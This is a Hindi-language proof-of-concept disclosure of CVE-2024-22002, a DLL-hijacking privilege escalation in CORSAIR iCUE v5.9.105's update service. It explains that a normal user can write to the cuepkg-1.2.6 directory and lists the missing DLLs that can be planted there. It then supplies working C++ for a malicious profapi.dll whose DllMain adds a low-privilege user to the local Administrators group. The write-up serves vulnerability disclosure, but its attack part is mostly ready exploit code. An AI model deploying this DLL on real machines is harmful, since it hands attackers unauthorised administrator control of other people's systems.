
स्थानीय विशेषाधिकार वृद्धि भेद्यता (CVE-2024-22002) के लिए प्रूफ-ऑफ-कॉन्सेप्ट, CORSAIR iCUE v5.9.105 में अपडेट प्रक्रिया के दौरान DLL हाइजैकिंग के माध्यम से, जो अविशेषाधिकार प्राप्त उपयोगकर्ताओं को SYSTEM विशेषाधिकार प्राप्त करने में सक्षम बनाता है।
iCUE v5.9.105 में एक DLL हाइजैकिंग कमजोरी की पहचान की गई है। यह कमजोरी अपडेट प्रक्रिया के दौरान होती है, जिसे "iCUEUpdateService" सेवा द्वारा प्रबंधित किया जाता है। सेवा एक प्रक्रिया ("cuepkg.exe") शुरू करती है जो अपडेट करने के लिए जिम्मेदार है, जो "NT AUTHORITY\SYSTEM" विशेषाधिकारों के साथ चलती है। प्रक्रिया शुरू करते समय, यह iCUE इंस्टॉलेशन निर्देशिका के अंदर स्थित निर्देशिका \cuepkg-1.2.6 में विभिन्न DLLs की खोज करती है। इनमें से कुछ DLLs डिफ़ॉल्ट रूप से मौजूद नहीं होते हैं, लेकिन चूंकि एक सामान्य उपयोगकर्ता के पास उस निर्देशिका में फ़ाइलें बनाने का अधिकार होता है, एक हमलावर संभावित रूप से निर्देशिका में एक दुर्भावनापूर्ण DLL डाल सकता है। परिणामस्वरूप, यह दुर्भावनापूर्ण DLL प्रशासक विशेषाधिकारों के साथ cuepkg.exe द्वारा लोड किया जाएगा।
प्रभावित DLLs पहचाने गए निम्नलिखित हैं:
MSASN1.dllNTASN1.dllprofapi.dllCVSS वेक्टर: (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
उदाहरण के तौर पर, DLL profapi.dll लिया जाएगा।
%INSTALLDIR%cuepkg-1.2.6 में जोड़ें।lowpriv उपयोगकर्ता के विशेषाधिकार दुर्भावनापूर्ण DLL निष्पादित होने से पहले:

lowpriv उपयोगकर्ता के विशेषाधिकार दुर्भावनापूर्ण DLL निष्पादित होने के बाद:

#include "pch.h"
#include <windows.h>
#include <cstdlib>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
{
system("net localgroup Administrators desktop-ckfiane\\lowpriv /add");
}
break;
case DLL_PROCESS_DETACH:
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
}
return TRUE;
}